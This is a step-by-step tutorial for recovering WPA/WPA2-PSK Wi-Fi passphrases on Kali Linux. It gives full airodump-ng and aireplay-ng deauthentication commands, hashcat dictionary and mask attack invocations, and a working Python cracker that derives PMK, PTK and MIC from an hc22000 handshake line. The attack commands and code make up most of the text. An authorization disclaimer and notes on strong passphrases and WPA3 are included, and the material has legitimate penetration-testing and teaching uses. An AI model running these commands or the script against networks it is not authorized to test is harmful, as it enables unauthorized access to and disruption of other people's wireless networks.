This article walks step by step through recovering a WPA/WPA2-PSK Wi-Fi passphrase with Kali Linux and tools such as aircrack-ng and hashcat.
The main stages are enabling monitor mode, capturing the 4-way handshake (speeding it up with a deauthentication attack), converting the capture file with hashcat.net/cap2hashcat, and running a dictionary attack against the resulting hash with hashcat.
The method only works against weak passphrases that appear in a wordlist, and it must be used only against networks you own or are authorized to test.
Table of Contents
- Preparation
- Step 1: Monitoring the Air
- Step 2: Capturing the Handshake
- Step 3: Converting the Capture File
- Step 4: Brute Force with Hashcat
- Wordlists
- Conclusion
Preparation
First update the repositories and obtain superuser privileges:
sudo su
apt update && apt upgrade
Step 1: Monitoring the Air
Switch the network adapter to monitor mode so it can capture all packets within range.
Check your wireless interface:
iwconfig
Look for the name of your Wi-Fi adapter (usually wlan0).
Enable monitor mode (if airmon-ng lists processes that could interfere, such as NetworkManager or wpa_supplicant, stop them first with its check kill subcommand):
airmon-ng start wlan0
The interface name will usually change to wlan0mon.
Now scan for nearby networks:
airodump-ng wlan0mon
Note the following for the target network:
- BSSID — router (access point) MAC address
- CH — channel
Also check the ENC, AUTH and ESSID columns: the target should be WPA2 with PSK. This procedure does not apply to WPA3-SAE or to 802.1X (enterprise) networks, which have no pre-shared-key handshake to attack.
Step 2: Capturing the Handshake
To recover the password we must capture the WPA 4-way handshake, which is exchanged every time a client connects (or reconnects) to the router. Hashcat needs at least two consecutive messages of that handshake; the MIC they carry is what each password candidate is checked against.
Start packet capture (airodump-ng numbers its output files, so the first run writes WPAcrack-01.cap):
airodump-ng --bssid {MAC} -c {CH} --write WPAcrack wlan0mon
Speeding up the process (Deauth attack)
Rather than wait for a client to reconnect on its own, we can force a disconnection. Run this in a second terminal while airodump-ng keeps capturing; -a is the BSSID of the access point and 20 is the number of deauthentication bursts to send (add -c {CLIENT MAC} to target a single client instead of broadcasting):
aireplay-ng --deauth 20 -a {MAC} wlan0mon
When "WPA handshake: {MAC}" appears in the top right of the airodump-ng window, the capture is successful. If the access point enforces Protected Management Frames (802.11w, mandatory in WPA3), clients discard spoofed deauthentication frames and you have to wait for a genuine reconnection.
Step 3: Converting the Capture File
The .cap file written by airodump-ng contains a lot of other traffic (beacons, data frames) besides the handshake.
Hashcat cannot use it directly, so it must be converted to its hc22000 hash format.
Official converter:
https://hashcat.net/cap2hashcat/
Steps:
- Upload the file WPAcrack-01.cap
- The service analyzes the capture
- It generates a file with the extension .hc22000
This file contains the cleaned hash (one line per handshake or PMKID found) ready for password cracking.
If the .cap file contains several handshakes, the service may detect multiple networks.
Note that uploading a capture sends the SSID, the access point and client MAC addresses and the handshake itself to a third party; the same conversion can be done offline with hcxpcapngtool from the hcxtools package, which writes the same hc22000 format.
Step 4: Brute Force (Hashcat)
Now we move to the most resource-intensive step: password cracking using GPU acceleration. For every candidate, hashcat runs PBKDF2-HMAC-SHA1 with 4096 iterations (the WPA2-PSK key derivation) and compares the resulting MIC with the captured one, which is why a GPU matters here.
Use hash mode 22000 (WPA-PBKDF2-PMKID+EAPOL), the current hashcat mode for WPA/WPA2 handshakes and PMKIDs; it replaced the older 2500 and 16800 modes.
Example command (attack mode -a 0 is a straight dictionary attack; several wordlists can be given, and on Kali the binary is simply hashcat):
hashcat.exe -m 22000 -a 0 WPAcrack.hc22000 ../rockyou.txt ../3WiFi_cnt_WiFiKey.txt
To display the cracked password (hashcat keeps found passwords in its potfile, so this works after the run has finished):
hashcat.exe -m 22000 WPAcrack.hc22000 --show
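To make concrete what the .hc22000 file from Step 3 contains and what hashcat does with it in Step 4, here is an added Python example (written for this article; it is not hashcat's code or the author's) that parses a WPA*02 line, derives the PMK, PTK and EAPOL MIC for each wordlist entry and reports the first match. The hc22000 line it attacks is generated inside the script from an invented passphrase, SSID, MAC addresses and nonces, so it runs offline; a real line from cap2hashcat would carry the client's RSN information element in the EAPOL key data and a real message-pair code, neither of which changes the MIC computation.

```python
"""Dictionary attack on a WPA2-PSK 4-way handshake in hashcat's hc22000 format.

Added example, not from the original article. All inputs are a constructed
fixture: the SSID, MACs, nonces and passphrase are invented and the hc22000
line is generated from them, not captured from the air.
"""
import hashlib
import hmac
import struct

SNONCE_OFFSET = 17  # 802.1X hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay ctr(8)
MIC_OFFSET = 81     # ... + nonce(32) + IV(16) + RSC(8) + key ID(8); MIC field is 16 bytes


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    These 4096 rounds per candidate are the cost that makes the attack GPU-bound."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def derive_ptk(pmk, mac_ap, mac_sta, anonce, snonce, length=48) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(PMK, label || 0x00 || data || counter)."""
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, key_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame (MIC field zeroed), per key descriptor version."""
    if key_version == 1:  # WPA1/TKIP: HMAC-MD5
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()
    if key_version == 2:  # WPA2/CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"key descriptor version {key_version} (AES-CMAC, SHA-256 AKMs/WPA3) not handled")


def parse_hc22000(line: str) -> dict:
    """Split a WPA*02 (EAPOL) line: PROTOCOL*TYPE*MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR.
    All fields but PROTOCOL are hex; the EAPOL field is the captured frame with its MIC zeroed."""
    proto, typ, mic, mac_ap, mac_sta, essid, anonce, eapol, _msgpair = line.strip().split("*")
    if proto != "WPA" or typ != "02":
        raise ValueError("only WPA*02 (EAPOL handshake) lines are handled; type 01 is a PMKID line")
    return {"mic": bytes.fromhex(mic), "mac_ap": bytes.fromhex(mac_ap), "mac_sta": bytes.fromhex(mac_sta),
            "essid": bytes.fromhex(essid), "anonce": bytes.fromhex(anonce), "eapol": bytes.fromhex(eapol)}


def candidate_mic(h: dict, passphrase: str) -> bytes:
    """What hashcat computes once per wordlist entry: passphrase -> PMK -> PTK -> KCK -> MIC."""
    eapol = h["eapol"]
    key_version = struct.unpack(">H", eapol[5:7])[0] & 0x0007   # low 3 bits of Key Information
    snonce = eapol[SNONCE_OFFSET:SNONCE_OFFSET + 32]            # SNonce travels inside message 2
    pmk = pmk_from_passphrase(passphrase, h["essid"])
    kck = derive_ptk(pmk, h["mac_ap"], h["mac_sta"], h["anonce"], snonce)[:16]  # KCK = first 128 bits of PTK
    return eapol_mic(kck, eapol, key_version)


def crack(line: str, wordlist):
    """Return the first candidate whose MIC equals the captured MIC, or None if none matches."""
    h = parse_hc22000(line)
    for word in wordlist:
        if hmac.compare_digest(candidate_mic(h, word), h["mic"]):
            return word
    return None


def build_eapol_m2(snonce: bytes, key_version: int, key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key message 2 with the MIC field zeroed (Key Info = MIC | Pairwise | version)."""
    descriptor = 0xFE if key_version == 1 else 2
    key_info = 0x0100 | 0x0008 | key_version
    body = (struct.pack(">BHHQ", descriptor, key_info, 16, 1) + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 1, 3, len(body)) + body


def make_hc22000_line(passphrase, ssid, mac_ap, mac_sta, anonce, snonce, key_version=2) -> str:
    """Fixture generator: a self-consistent hc22000 line for a known passphrase (hypothetical data)."""
    eapol = build_eapol_m2(snonce, key_version)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), mac_ap, mac_sta, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, key_version)
    return "*".join(["WPA", "02", mic.hex(), mac_ap.hex(), mac_sta.hex(), ssid.hex(), anonce.hex(), eapol.hex(), "02"])


# Constructed fixture (invented values, not a real capture).
SSID = b"ExampleNet"
MAC_AP = bytes.fromhex("001122334455")
MAC_STA = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
FIXTURE_LINE = make_hc22000_line("password123", SSID, MAC_AP, MAC_STA, ANONCE, SNONCE)
WORDLIST = ["123456", "qwerty", "password123", "letmein"]

if __name__ == "__main__":
    print(FIXTURE_LINE)
    print("recovered:", crack(FIXTURE_LINE, WORDLIST))
```

Run it directly to print the fixture line and the recovered passphrase. With hashcat, crack() corresponds to the -a 0 run in Step 4; adding a rule file such as -r rules/best64.rule makes it try variations of each wordlist entry, and -a 3 with a mask such as ?d?d?d?d?d?d?d?d covers the common case of an 8-digit numeric default key.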
Wordlists
Password recovery depends heavily on the quality of the wordlist.
Common sources include:
- rockyou.txt (shipped with Kali as /usr/share/wordlists/rockyou.txt.gz)
- custom generated dictionaries
- community wordlists
Conclusion
This method only works against simple passphrases that exist in wordlists such as rockyou, or that are one rule transformation away from an entry in them.
WPA2-PSK passphrases are 8 to 63 characters long; a random passphrase of 12 or more characters is out of reach of dictionary and mask attacks, since every candidate costs 4096 PBKDF2 iterations.
⚠️ Important
Perform tests only on networks you own.
Unauthorized access to other networks may violate the law.